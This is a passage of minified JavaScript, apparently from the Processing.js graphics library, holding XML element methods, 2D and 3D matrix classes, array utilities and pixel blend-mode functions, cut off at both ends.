this.getAttribute(arguments[0])}if(arguments.length===2){return this.getAttribute(arguments[0],arguments[1])}return this.getAttribute(arguments[0],arguments[1],arguments[2])},getString:function(d7){return this.getStringAttribute(d7)},getFloatAttribute:function(){if(arguments.length===1){return parseFloat(this.getAttribute(arguments[0],0))}if(arguments.length===2){return this.getAttribute(arguments[0],arguments[1])}return this.getAttribute(arguments[0],arguments[1],arguments[2])},getFloat:function(d7){return this.getFloatAttribute(d7)},getIntAttribute:function(){if(arguments.length===1){return this.getAttribute(arguments[0],0)}if(arguments.length===2){return this.getAttribute(arguments[0],arguments[1])}return this.getAttribute(arguments[0],arguments[1],arguments[2])},getInt:function(d7){return this.getIntAttribute(d7)},hasChildren:function(){return this.children.length>0},addChild:function(d7){if(d7!==null){d7.parent=this;this.children.push(d7)}},insertChild:function(d9,d7){if(d9){if(d9.getLocalName()===null&&!this.hasChildren()){var d8=this.children[this.children.length-1];if(d8.getLocalName()===null){d8.setContent(d8.getContent()+d9.getContent());return}}d9.parent=this;this.children.splice(d7,0,d9)}},getChild:function(){if(typeof arguments[0]==="number"){return this.children[arguments[0]]}if(arguments[0].indexOf("/")!==-1){this.getChildRecursive(arguments[0].split("/"),0);return null}var d7,ea;for(var d9=0,d8=this.getChildCount();d9<d8;d9++){d7=this.getChild(d9);ea=d7.getName();if(ea!==null&&ea===arguments[0]){return d7}}return null},getChildren:function(){if(arguments.length===1){if(typeof arguments[0]==="number"){return this.getChild(arguments[0])}if(arguments[0].indexOf("/")!==-1){return this.getChildrenRecursive(arguments[0].split("/"),0)}var eb=[];var d7,ea;for(var d9=0,d8=this.getChildCount();d9<d8;d9++){d7=this.getChild(d9);ea=d7.getName();if(ea!==null&&ea===arguments[0]){eb.push(d7)}}return eb}return this.children},getChildCount:function(){return this.children.length},getChildRecursive:function(d8,ec){var d7,eb;for(var ea=0,d9=this.getChildCount();ea<d9;ea++){d7=this.getChild(ea);eb=d7.getName();if(eb!==null&&eb===d8[ec]){if(ec===d8.length-1){return d7}ec+=1;return d7.getChildRecursive(d8,ec)}}return null},getChildrenRecursive:function(d7,eb){if(eb===d7.length-1){return this.getChildren(d7[eb])}var ea=this.getChildren(d7[eb]);var d9=[];for(var d8=0;d8<ea.length;d8++){d9=d9.concat(ea[d8].getChildrenRecursive(d7,eb+1))}return d9},isLeaf:function(){return !this.hasChildren()},listChildren:function(){var d7=[];for(var d9=0,d8=this.children.length;d9<d8;d9++){d7.push(this.getChild(d9).getName())}return d7},removeAttribute:function(d8,ea){this.namespace=ea||"";for(var d9=0,d7=this.attributes.length;d9<d7;d9++){if(this.attributes[d9].getName()===d8&&this.attributes[d9].getNamespace()===this.namespace){this.attributes.splice(d9,1);break}}},removeChild:function(d9){if(d9){for(var d8=0,d7=this.children.length;d8<d7;d8++){if(this.children[d8].equals(d9)){this.children.splice(d8,1);break}}}},removeChildAtIndex:function(d7){if(this.children.length>d7){this.children.splice(d7,1)}},findAttribute:function(d8,ea){this.namespace=ea||"";for(var d9=0,d7=this.attributes.length;d9<d7;d9++){if(this.attributes[d9].getName()===d8&&this.attributes[d9].getNamespace()===this.namespace){return this.attributes[d9]}}return null},setAttribute:function(){var d7;if(arguments.length===3){var d9=arguments[0].indexOf(":");var d8=arguments[0].substring(d9+1);d7=this.findAttribute(d8,arguments[1]);if(d7){d7.setValue(arguments[2])}else{d7=new cS(arguments[0],d8,arguments[1],arguments[2],"CDATA");this.attributes.push(d7)}}else{d7=this.findAttribute(arguments[0]);if(d7){d7.setValue(arguments[1])}else{d7=new cS(arguments[0],arguments[0],null,arguments[1],"CDATA");this.attributes.push(d7)}}},setString:function(d7,d8){this.setAttribute(d7,d8)},setInt:function(d7,d8){this.setAttribute(d7,d8)},setFloat:function(d7,d8){this.setAttribute(d7,d8)},setContent:function(d7){if(this.children.length>0){D.debug("Tried to set content for XMLElement with children")}this.content=d7},setName:function(){if(arguments.length===1){this.name=arguments[0];this.fullName=arguments[0];this.namespace=null}else{var d7=arguments[0].indexOf(":");if(arguments[1]===null||d7<0){this.name=arguments[0]}else{this.name=arguments[0].substring(d7+1)}this.fullName=arguments[0];this.namespace=arguments[1]}},getName:function(){return this.fullName},getLocalName:function(){return this.name},getAttributeCount:function(){return this.attributes.length},toString:function(){if(this.type==="TEXT"){return this.content}var d9=(this.namespace!==""&&this.namespace!==this.name?this.namespace+":":"")+this.name;var ea="<"+d9;var d8,eb;for(d8=0;d8<this.attributes.length;d8++){var d7=this.attributes[d8];ea+=" "+d7.getName()+'="'+d7.getValue()+'"'}if(this.children.length===0){if(this.content===""){ea+="/>"}else{ea+=">"+this.content+"</"+d9+">"}}else{ea+=">";for(eb=0;eb<this.children.length;eb++){ea+=this.children[eb].toString()}ea+="</"+d9+">"}return ea}};b8.parse=function(d8){var d7=new b8;d7.parse(d8);return d7};var cl=function(ea){var d7=0;for(var d8=0;d8<ea.length;d8++){if(d8!==0){d7=o.max(d7,o.abs(ea[d8]))}else{d7=o.abs(ea[d8])}}var d9=(d7+"").indexOf(".");if(d9===0){d9=1}else{if(d9===-1){d9=(d7+"").length}}return d9};var aT=cV.PMatrix2D=function(){if(arguments.length===0){this.reset()}else{if(arguments.length===1&&arguments[0] instanceof aT){this.set(arguments[0].array())}else{if(arguments.length===6){this.set(arguments[0],arguments[1],arguments[2],arguments[3],arguments[4],arguments[5])}}}};aT.prototype={set:function(){if(arguments.length===6){var d7=arguments;this.set([d7[0],d7[1],d7[2],d7[3],d7[4],d7[5]])}else{if(arguments.length===1&&arguments[0] instanceof aT){this.elements=arguments[0].array()}else{if(arguments.length===1&&arguments[0] instanceof Array){this.elements=arguments[0].slice()}}}},get:function(){var d7=new aT;d7.set(this.elements);return d7},reset:function(){this.set([1,0,0,0,1,0])},array:function aD(){return this.elements.slice()},translate:function(d8,d7){this.elements[2]=d8*this.elements[0]+d7*this.elements[1]+this.elements[2];this.elements[5]=d8*this.elements[3]+d7*this.elements[4]+this.elements[5]},invTranslate:function(d8,d7){this.translate(-d8,-d7)},transpose:function(){},mult:function(d8,d9){var d7,ea;if(d8 instanceof y){d7=d8.x;ea=d8.y;if(!d9){d9=new y}}else{if(d8 instanceof Array){d7=d8[0];ea=d8[1];if(!d9){d9=[]}}}if(d9 instanceof Array){d9[0]=this.elements[0]*d7+this.elements[1]*ea+this.elements[2];d9[1]=this.elements[3]*d7+this.elements[4]*ea+this.elements[5]}else{if(d9 instanceof y){d9.x=this.elements[0]*d7+this.elements[1]*ea+this.elements[2];d9.y=this.elements[3]*d7+this.elements[4]*ea+this.elements[5];d9.z=0}}return d9},multX:function(d7,d8){return d7*this.elements[0]+d8*this.elements[1]+this.elements[2]},multY:function(d7,d8){return d7*this.elements[3]+d8*this.elements[4]+this.elements[5]},skewX:function(d7){this.apply(1,0,1,d7,0,0)},skewY:function(d7){this.apply(1,0,1,0,d7,0)},determinant:function(){return this.elements[0]*this.elements[4]-this.elements[1]*this.elements[3]},invert:function(){var ec=this.determinant();if(o.abs(ec)>-2147483648){var d8=this.elements[0];var ed=this.elements[1];var eb=this.elements[2];var ea=this.elements[3];var d9=this.elements[4];var d7=this.elements[5];this.elements[0]=d9/ec;this.elements[3]=-ea/ec;this.elements[1]=-ed/ec;this.elements[4]=d8/ec;this.elements[2]=(ed*d7-d9*eb)/ec;this.elements[5]=(ea*eb-d8*d7)/ec;return true}return false},scale:function(d8,d7){if(d8&&!d7){d7=d8}if(d8&&d7){this.elements[0]*=d8;this.elements[1]*=d7;this.elements[3]*=d8;this.elements[4]*=d7}},invScale:function(d8,d7){if(d8&&!d7){d7=d8}this.scale(1/d8,1/d7)},apply:function(){var d9;if(arguments.length===1&&arguments[0] instanceof aT){d9=arguments[0].array()}else{if(arguments.length===6){d9=Array.prototype.slice.call(arguments)}else{if(arguments.length===1&&arguments[0] instanceof Array){d9=arguments[0]}}}var d7=[0,0,this.elements[2],0,0,this.elements[5]];var ea=0;for(var eb=0;eb<2;eb++){for(var d8=0;d8<3;d8++,ea++){d7[ea]+=this.elements[eb*3+0]*d9[d8+0]+this.elements[eb*3+1]*d9[d8+3]}}this.elements=d7.slice()},preApply:function(){var d8;if(arguments.length===1&&arguments[0] instanceof aT){d8=arguments[0].array()}else{if(arguments.length===6){d8=Array.prototype.slice.call(arguments)}else{if(arguments.length===1&&arguments[0] instanceof Array){d8=arguments[0]}}}var d7=[0,0,d8[2],0,0,d8[5]];d7[2]=d8[2]+this.elements[2]*d8[0]+this.elements[5]*d8[1];d7[5]=d8[5]+this.elements[2]*d8[3]+this.elements[5]*d8[4];d7[0]=this.elements[0]*d8[0]+this.elements[3]*d8[1];d7[3]=this.elements[0]*d8[3]+this.elements[3]*d8[4];d7[1]=this.elements[1]*d8[0]+this.elements[4]*d8[1];d7[4]=this.elements[1]*d8[3]+this.elements[4]*d8[4];this.elements=d7.slice()},rotate:function(d9){var eb=o.cos(d9);var d7=o.sin(d9);var ea=this.elements[0];var d8=this.elements[1];this.elements[0]=eb*ea+d7*d8;this.elements[1]=-d7*ea+eb*d8;ea=this.elements[3];d8=this.elements[4];this.elements[3]=eb*ea+d7*d8;this.elements[4]=-d7*ea+eb*d8},rotateZ:function(d7){this.rotate(d7)},invRotateZ:function(d7){this.rotateZ(d7-o.PI)},print:function(){var d8=cl(this.elements);var d7=""+cV.nfs(this.elements[0],d8,4)+" "+cV.nfs(this.elements[1],d8,4)+" "+cV.nfs(this.elements[2],d8,4)+"\n"+cV.nfs(this.elements[3],d8,4)+" "+cV.nfs(this.elements[4],d8,4)+" "+cV.nfs(this.elements[5],d8,4)+"\n\n";cV.println(d7)}};var aM=cV.PMatrix3D=function(){this.reset()};aM.prototype={set:function(){if(arguments.length===16){this.elements=Array.prototype.slice.call(arguments)}else{if(arguments.length===1&&arguments[0] instanceof aM){this.elements=arguments[0].array()}else{if(arguments.length===1&&arguments[0] instanceof Array){this.elements=arguments[0].slice()}}}},get:function(){var d7=new aM;d7.set(this.elements);return d7},reset:function(){this.elements=[1,0,0,0,0,1,0,0,0,0,1,0,0,0,0,1]},array:function aD(){return this.elements.slice()},translate:function(d8,d7,d9){if(d9===r){d9=0}this.elements[3]+=d8*this.elements[0]+d7*this.elements[1]+d9*this.elements[2];this.elements[7]+=d8*this.elements[4]+d7*this.elements[5]+d9*this.elements[6];this.elements[11]+=d8*this.elements[8]+d7*this.elements[9]+d9*this.elements[10];this.elements[15]+=d8*this.elements[12]+d7*this.elements[13]+d9*this.elements[14]},transpose:function(){var d7=this.elements[4];this.elements[4]=this.elements[1];this.elements[1]=d7;d7=this.elements[8];this.elements[8]=this.elements[2];this.elements[2]=d7;d7=this.elements[6];this.elements[6]=this.elements[9];this.elements[9]=d7;d7=this.elements[3];this.elements[3]=this.elements[12];this.elements[12]=d7;d7=this.elements[7];this.elements[7]=this.elements[13];this.elements[13]=d7;d7=this.elements[11];this.elements[11]=this.elements[14];this.elements[14]=d7},mult:function(d9,ea){var d7,ec,eb,d8;if(d9 instanceof y){d7=d9.x;ec=d9.y;eb=d9.z;d8=1;if(!ea){ea=new y}}else{if(d9 instanceof Array){d7=d9[0];ec=d9[1];eb=d9[2];d8=d9[3]||1;if(!ea||ea.length!==3&&ea.length!==4){ea=[0,0,0]}}}if(ea instanceof Array){if(ea.length===3){ea[0]=this.elements[0]*d7+this.elements[1]*ec+this.elements[2]*eb+this.elements[3];ea[1]=this.elements[4]*d7+this.elements[5]*ec+this.elements[6]*eb+this.elements[7];ea[2]=this.elements[8]*d7+this.elements[9]*ec+this.elements[10]*eb+this.elements[11]}else{if(ea.length===4){ea[0]=this.elements[0]*d7+this.elements[1]*ec+this.elements[2]*eb+this.elements[3]*d8;ea[1]=this.elements[4]*d7+this.elements[5]*ec+this.elements[6]*eb+this.elements[7]*d8;ea[2]=this.elements[8]*d7+this.elements[9]*ec+this.elements[10]*eb+this.elements[11]*d8;ea[3]=this.elements[12]*d7+this.elements[13]*ec+this.elements[14]*eb+this.elements[15]*d8}}}if(ea instanceof y){ea.x=this.elements[0]*d7+this.elements[1]*ec+this.elements[2]*eb+this.elements[3];ea.y=this.elements[4]*d7+this.elements[5]*ec+this.elements[6]*eb+this.elements[7];ea.z=this.elements[8]*d7+this.elements[9]*ec+this.elements[10]*eb+this.elements[11]}return ea},preApply:function(){var d9;if(arguments.length===1&&arguments[0] instanceof aM){d9=arguments[0].array()}else{if(arguments.length===16){d9=Array.prototype.slice.call(arguments)}else{if(arguments.length===1&&arguments[0] instanceof Array){d9=arguments[0]}}}var d7=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];var ea=0;for(var eb=0;eb<4;eb++){for(var d8=0;d8<4;d8++,ea++){d7[ea]+=this.elements[d8+0]*d9[eb*4+0]+this.elements[d8+4]*d9[eb*4+1]+this.elements[d8+8]*d9[eb*4+2]+this.elements[d8+12]*d9[eb*4+3]}}this.elements=d7.slice()},apply:function(){var d9;if(arguments.length===1&&arguments[0] instanceof aM){d9=arguments[0].array()}else{if(arguments.length===16){d9=Array.prototype.slice.call(arguments)}else{if(arguments.length===1&&arguments[0] instanceof Array){d9=arguments[0]}}}var d7=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0];var ea=0;for(var eb=0;eb<4;eb++){for(var d8=0;d8<4;d8++,ea++){d7[ea]+=this.elements[eb*4+0]*d9[d8+0]+this.elements[eb*4+1]*d9[d8+4]+this.elements[eb*4+2]*d9[d8+8]+this.elements[eb*4+3]*d9[d8+12]}}this.elements=d7.slice()},rotate:function(eb,d7,ed,ea){if(!ed){this.rotateZ(eb)}else{var ec=cV.cos(eb);var d9=cV.sin(eb);var d8=1-ec;this.apply(d8*d7*d7+ec,d8*d7*ed-d9*ea,d8*d7*ea+d9*ed,0,d8*d7*ed+d9*ea,d8*ed*ed+ec,d8*ed*ea-d9*d7,0,d8*d7*ea-d9*ed,d8*ed*ea+d9*d7,d8*ea*ea+ec,0,0,0,0,1)}},invApply:function(){if(Z===r){Z=new aM}var d7=arguments;Z.set(d7[0],d7[1],d7[2],d7[3],d7[4],d7[5],d7[6],d7[7],d7[8],d7[9],d7[10],d7[11],d7[12],d7[13],d7[14],d7[15]);if(!Z.invert()){return false}this.preApply(Z);return true},rotateX:function(d8){var d9=cV.cos(d8);var d7=cV.sin(d8);this.apply([1,0,0,0,0,d9,-d7,0,0,d7,d9,0,0,0,0,1])},rotateY:function(d8){var d9=cV.cos(d8);var d7=cV.sin(d8);this.apply([d9,0,d7,0,0,1,0,0,-d7,0,d9,0,0,0,0,1])},rotateZ:function(d8){var d9=o.cos(d8);var d7=o.sin(d8);this.apply([d9,-d7,0,0,d7,d9,0,0,0,0,1,0,0,0,0,1])},scale:function(d9,d8,d7){if(d9&&!d8&&!d7){d8=d7=d9}else{if(d9&&d8&&!d7){d7=1}}if(d9&&d8&&d7){this.elements[0]*=d9;this.elements[1]*=d8;this.elements[2]*=d7;this.elements[4]*=d9;this.elements[5]*=d8;this.elements[6]*=d7;this.elements[8]*=d9;this.elements[9]*=d8;this.elements[10]*=d7;this.elements[12]*=d9;this.elements[13]*=d8;this.elements[14]*=d7}},skewX:function(d8){var d7=o.tan(d8);this.apply(1,d7,0,0,0,1,0,0,0,0,1,0,0,0,0,1)},skewY:function(d8){var d7=o.tan(d8);this.apply(1,0,0,0,d7,1,0,0,0,0,1,0,0,0,0,1)},multX:function(d7,ea,d9,d8){if(!d9){return this.elements[0]*d7+this.elements[1]*ea+this.elements[3]}if(!d8){return this.elements[0]*d7+this.elements[1]*ea+this.elements[2]*d9+this.elements[3]}return this.elements[0]*d7+this.elements[1]*ea+this.elements[2]*d9+this.elements[3]*d8},multY:function(d7,ea,d9,d8){if(!d9){return this.elements[4]*d7+this.elements[5]*ea+this.elements[7]}if(!d8){return this.elements[4]*d7+this.elements[5]*ea+this.elements[6]*d9+this.elements[7]}return this.elements[4]*d7+this.elements[5]*ea+this.elements[6]*d9+this.elements[7]*d8},multZ:function(d7,ea,d9,d8){if(!d8){return this.elements[8]*d7+this.elements[9]*ea+this.elements[10]*d9+this.elements[11]}return this.elements[8]*d7+this.elements[9]*ea+this.elements[10]*d9+this.elements[11]*d8},multW:function(d7,ea,d9,d8){if(!d8){return this.elements[12]*d7+this.elements[13]*ea+this.elements[14]*d9+this.elements[15]}return this.elements[12]*d7+this.elements[13]*ea+this.elements[14]*d9+this.elements[15]*d8},invert:function(){var eg=this.elements[0]*this.elements[5]-this.elements[1]*this.elements[4];var ef=this.elements[0]*this.elements[6]-this.elements[2]*this.elements[4];var ee=this.elements[0]*this.elements[7]-this.elements[3]*this.elements[4];var ed=this.elements[1]*this.elements[6]-this.elements[2]*this.elements[5];var ec=this.elements[1]*this.elements[7]-this.elements[3]*this.elements[5];var eb=this.elements[2]*this.elements[7]-this.elements[3]*this.elements[6];var ea=this.elements[8]*this.elements[13]-this.elements[9]*this.elements[12];var d9=this.elements[8]*this.elements[14]-this.elements[10]*this.elements[12];var d8=this.elements[8]*this.elements[15]-this.elements[11]*this.elements[12];var el=this.elements[9]*this.elements[14]-this.elements[10]*this.elements[13];var ej=this.elements[9]*this.elements[15]-this.elements[11]*this.elements[13];var ei=this.elements[10]*this.elements[15]-this.elements[11]*this.elements[14];var ek=eg*ei-ef*ej+ee*el+ed*d8-ec*d9+eb*ea;if(o.abs(ek)<=1e-9){return false}var eh=[];eh[0]=+this.elements[5]*ei-this.elements[6]*ej+this.elements[7]*el;eh[4]=-this.elements[4]*ei+this.elements[6]*d8-this.elements[7]*d9;eh[8]=+this.elements[4]*ej-this.elements[5]*d8+this.elements[7]*ea;eh[12]=-this.elements[4]*el+this.elements[5]*d9-this.elements[6]*ea;eh[1]=-this.elements[1]*ei+this.elements[2]*ej-this.elements[3]*el;eh[5]=+this.elements[0]*ei-this.elements[2]*d8+this.elements[3]*d9;eh[9]=-this.elements[0]*ej+this.elements[1]*d8-this.elements[3]*ea;eh[13]=+this.elements[0]*el-this.elements[1]*d9+this.elements[2]*ea;eh[2]=+this.elements[13]*eb-this.elements[14]*ec+this.elements[15]*ed;eh[6]=-this.elements[12]*eb+this.elements[14]*ee-this.elements[15]*ef;eh[10]=+this.elements[12]*ec-this.elements[13]*ee+this.elements[15]*eg;eh[14]=-this.elements[12]*ed+this.elements[13]*ef-this.elements[14]*eg;eh[3]=-this.elements[9]*eb+this.elements[10]*ec-this.elements[11]*ed;eh[7]=+this.elements[8]*eb-this.elements[10]*ee+this.elements[11]*ef;eh[11]=-this.elements[8]*ec+this.elements[9]*ee-this.elements[11]*eg;eh[15]=+this.elements[8]*ed-this.elements[9]*ef+this.elements[10]*eg;var d7=1/ek;eh[0]*=d7;eh[1]*=d7;eh[2]*=d7;eh[3]*=d7;eh[4]*=d7;eh[5]*=d7;eh[6]*=d7;eh[7]*=d7;eh[8]*=d7;eh[9]*=d7;eh[10]*=d7;eh[11]*=d7;eh[12]*=d7;eh[13]*=d7;eh[14]*=d7;eh[15]*=d7;this.elements=eh.slice();return true},toString:function(){var d8="";for(var d7=0;d7<15;d7++){d8+=this.elements[d7]+", "}d8+=this.elements[15];return d8},print:function(){var d8=cl(this.elements);var d7=""+cV.nfs(this.elements[0],d8,4)+" "+cV.nfs(this.elements[1],d8,4)+" "+cV.nfs(this.elements[2],d8,4)+" "+cV.nfs(this.elements[3],d8,4)+"\n"+cV.nfs(this.elements[4],d8,4)+" "+cV.nfs(this.elements[5],d8,4)+" "+cV.nfs(this.elements[6],d8,4)+" "+cV.nfs(this.elements[7],d8,4)+"\n"+cV.nfs(this.elements[8],d8,4)+" "+cV.nfs(this.elements[9],d8,4)+" "+cV.nfs(this.elements[10],d8,4)+" "+cV.nfs(this.elements[11],d8,4)+"\n"+cV.nfs(this.elements[12],d8,4)+" "+cV.nfs(this.elements[13],d8,4)+" "+cV.nfs(this.elements[14],d8,4)+" "+cV.nfs(this.elements[15],d8,4)+"\n\n";cV.println(d7)},invTranslate:function(d8,d7,d9){this.preApply(1,0,0,-d8,0,1,0,-d7,0,0,1,-d9,0,0,0,1)},invRotateX:function(d8){var d9=o.cos(-d8);var d7=o.sin(-d8);this.preApply([1,0,0,0,0,d9,-d7,0,0,d7,d9,0,0,0,0,1])},invRotateY:function(d8){var d9=o.cos(-d8);var d7=o.sin(-d8);this.preApply([d9,0,d7,0,0,1,0,0,-d7,0,d9,0,0,0,0,1])},invRotateZ:function(d8){var d9=o.cos(-d8);var d7=o.sin(-d8);this.preApply([d9,-d7,0,0,d7,d9,0,0,0,0,1,0,0,0,0,1])},invScale:function(d7,d9,d8){this.preApply([1/d7,0,0,0,0,1/d9,0,0,0,0,1/d8,0,0,0,0,1])}};var T=cV.PMatrixStack=function(){this.matrixStack=[]};T.prototype.load=function(){var d7=dU.$newPMatrix();if(arguments.length===1){d7.set(arguments[0])}else{d7.set(arguments)}this.matrixStack.push(d7)};bO.prototype.$newPMatrix=function(){return new aT};by.prototype.$newPMatrix=function(){return new aM};T.prototype.push=function(){this.matrixStack.push(this.peek())};T.prototype.pop=function(){return this.matrixStack.pop()};T.prototype.peek=function(){var d7=dU.$newPMatrix();d7.set(this.matrixStack[this.matrixStack.length-1]);return d7};T.prototype.mult=function(d7){this.matrixStack[this.matrixStack.length-1].apply(d7)};cV.split=function(d8,d7){return d8.split(d7)};cV.splitTokens=function(ea,d9){if(arguments.length===1){d9="\n\t\r\u000c "}d9="["+d9+"]";var d8=[];var d7=0;var eb=ea.search(d9);while(eb>=0){if(eb===0){ea=ea.substring(1)}else{d8[d7]=ea.substring(0,eb);d7++;ea=ea.substring(eb)}eb=ea.search(d9)}if(ea.length>0){d8[d7]=ea}if(d8.length===0){d8=r}return d8};cV.append=function(d8,d7){d8[d8.length]=d7;return d8};cV.concat=function(d8,d7){return d8.concat(d7)};cV.sort=function(ec,ea){var d8=[];if(ec.length>0){var eb=ea>0?ea:ec.length;for(var d9=0;d9<eb;d9++){d8.push(ec[d9])}if(typeof ec[0]==="string"){d8.sort()}else{d8.sort(function(ee,ed){return ee-ed})}if(ea>0){for(var d7=d8.length;d7<ec.length;d7++){d8.push(ec[d7])}}}return d8};cV.splice=function(eb,ea,d8){if(ea.length===0){return eb}if(ea instanceof Array){for(var d9=0,d7=d8;d9<ea.length;d7++,d9++){eb.splice(d7,0,ea[d9])}}else{eb.splice(d8,0,ea)}return eb};cV.subset=function(ea,d9,d8){var d7=d8!==r?d9+d8:ea.length;return ea.slice(d9,d7)};cV.join=function(d8,d7){return d8.join(d7)};cV.shorten=function(ea){var d8=[];var d7=ea.length;for(var d9=0;d9<d7;d9++){d8[d9]=ea[d9]}d8.pop();return d8};cV.expand=function(d9,ea){var d8=d9.slice(0),d7=ea||d9.length*2;d8.length=d7;return d8};cV.arrayCopy=function(){var ed,eb=0,d9,d8=0,ec;if(arguments.length===2){ed=arguments[0];d9=arguments[1];ec=ed.length}else{if(arguments.length===3){ed=arguments[0];d9=arguments[1];ec=arguments[2]}else{if(arguments.length===5){ed=arguments[0];eb=arguments[1];d9=arguments[2];d8=arguments[3];ec=arguments[4]}}}for(var ea=eb,d7=d8;ea<ec+eb;ea++,d7++){if(d9[d7]!==r){d9[d7]=ed[ea]}else{throw"array index out of bounds exception"}}};cV.reverse=function(d7){return d7.reverse()};cV.mix=function(d8,d7,d9){return d8+((d7-d8)*d9>>8)};cV.peg=function(d7){return d7<0?0:d7>255?255:d7};cV.modes=function(){var ec=4278190080,d9=16711680,d8=65280,eb=255,ea=o.min,d7=o.max;function ed(ei,el,eh,eq,es,er,ej,en,em,ef,eg){var ep=ea(((ei&4278190080)>>>24)+el,255)<<24;var ee=eh+((em-eh)*el>>8);ee=(ee<0?0:ee>255?255:ee)<<16;var ek=eq+((ef-eq)*el>>8);ek=(ek<0?0:ek>255?255:ek)<<8;var eo=es+((eg-es)*el>>8);eo=eo<0?0:eo>255?255:eo;return ep|ee|ek|eo}return{replace:function(ef,ee){return ee},blend:function(eg,ef){var ei=(ef&ec)>>>24,ee=eg&d9,ek=eg&d8,em=eg&eb,el=ef&d9,eh=ef&d8,ej=ef&eb;return ea(((eg&ec)>>>24)+ei,255)<<24|ee+((el-ee)*ei>>8)&d9|ek+((eh-ek)*ei>>8)&d8|em+((ej-em)*ei>>8)&eb},add:function(ef,ee){var eg=(ee&ec)>>>24;return ea(((ef&ec)>>>24)+eg,255)<<24|ea((ef&d9)+((ee&d9)>>8)*eg,d9)&d9|ea((ef&d8)+((ee&d8)>>8)*eg,d8)&d8|ea((ef&eb)+((ee&eb)*eg>>8),eb)},subtract:function(ef,ee){var eg=(ee&ec)>>>24;return ea(((ef&ec)>>>24)+eg,255)<<24|d7((ef&d9)-((ee&d9)>>8)*eg,d8)&d9|d7((ef&d8)-((ee&d8)>>8)*eg,eb)&d8|d7((ef&eb)-((ee&eb)*eg>>8),0)},lightest:function(ef,ee){var eg=(ee&ec)>>>24;return ea(((ef&ec)>>>24)+eg,255)<<24|d7(ef&d9,((ee&d9)>>8)*eg)&d9|d7(ef&d8,((ee&d8)>>8)*eg)&d8|d7(ef&eb,(ee&eb)*eg>>8)},darkest:function(eg,ef){var ei=(ef&ec)>>>24,ee=eg&d9,ek=eg&d8,em=eg&eb,el=ea(eg&d9,((ef&d9)>>8)*ei),eh=ea(eg&d8,((ef&d8)>>8)*ei),ej=ea(eg&eb,(ef&eb)*ei>>8);return ea(((eg&ec)>>>24)+ei,255)<<24|ee+((el-ee)*ei>>8)&d9|ek+((eh-ek)*ei>>8)&d8|em+((ej-em)*ei>>8)&eb},difference:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=eg>eo?eg-eo:eo-eg,ee=en>ej?en-ej:ej-en,ef=ep>em?ep-em:em-ep;return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},exclusion:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=eg+eo-(eg*eo>>7),ee=en+ej-(en*ej>>7),ef=ep+em-(ep*em>>7);return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},multiply:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=eg*eo>>8,ee=en*ej>>8,ef=ep*em>>8;return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},screen:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=255-((255-eg)*(255-eo)>>8),ee=255-((255-en)*(255-ej)>>8),ef=255-((255-ep)*(255-em)>>8);return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},hard_light:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=eo<128?eg*eo>>7:255-((255-eg)*(255-eo)>>7),ee=ej<128?en*ej>>7:255-((255-en)*(255-ej)>>7),ef=em<128?ep*em>>7:255-((255-ep)*(255-em)>>7);return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},soft_light:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=(eg*eo>>7)+(eg*eg>>8)-(eg*eg*eo>>15),ee=(en*ej>>7)+(en*en>>8)-(en*en*ej>>15),ef=(ep*em>>7)+(ep*ep>>8)-(ep*ep*em>>15);return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},overlay:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb,el=eg<128?eg*eo>>7:255-((255-eg)*(255-eo)>>7),ee=en<128?en*ej>>7:255-((255-en)*(255-ej)>>7),ef=ep<128?ep*em>>7:255-((255-ep)*(255-em)>>7);return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},dodge:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb;var el=255;if(eo!==255){el=(eg<<8)/(255-eo);el=el<0?0:el>255?255:el}var ee=255;if(ej!==255){ee=(en<<8)/(255-ej);ee=ee<0?0:ee>255?255:ee}var ef=255;if(em!==255){ef=(ep<<8)/(255-em);ef=ef<0?0:ef>255?255:ef}return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)},burn:function(ei,eh){var ek=(eh&ec)>>>24,eg=(ei&d9)>>16,en=(ei&d8)>>8,ep=ei&eb,eo=(eh&d9)>>16,ej=(eh&d8)>>8,em=eh&eb;var el=0;if(eo!==0){el=(255-eg<<8)/eo;el=255-(el<0?0:el>255?255:el)}var ee=0;if(ej!==0){ee=(255-en<<8)/ej;ee=255-(ee<0?0:ee>255?255:ee)}var ef=0;if(em!==0){ef=(255-ep<<8)/em;ef=255-(ef<0?0:ef>255?255:ef)}return ed(ei,ek,eg,en,ep,eo,ej,em,el,ee,ef)}}}();function dD(ec,eb,d9,d8){var d7,ea,ee,ef;if(cX===3){var 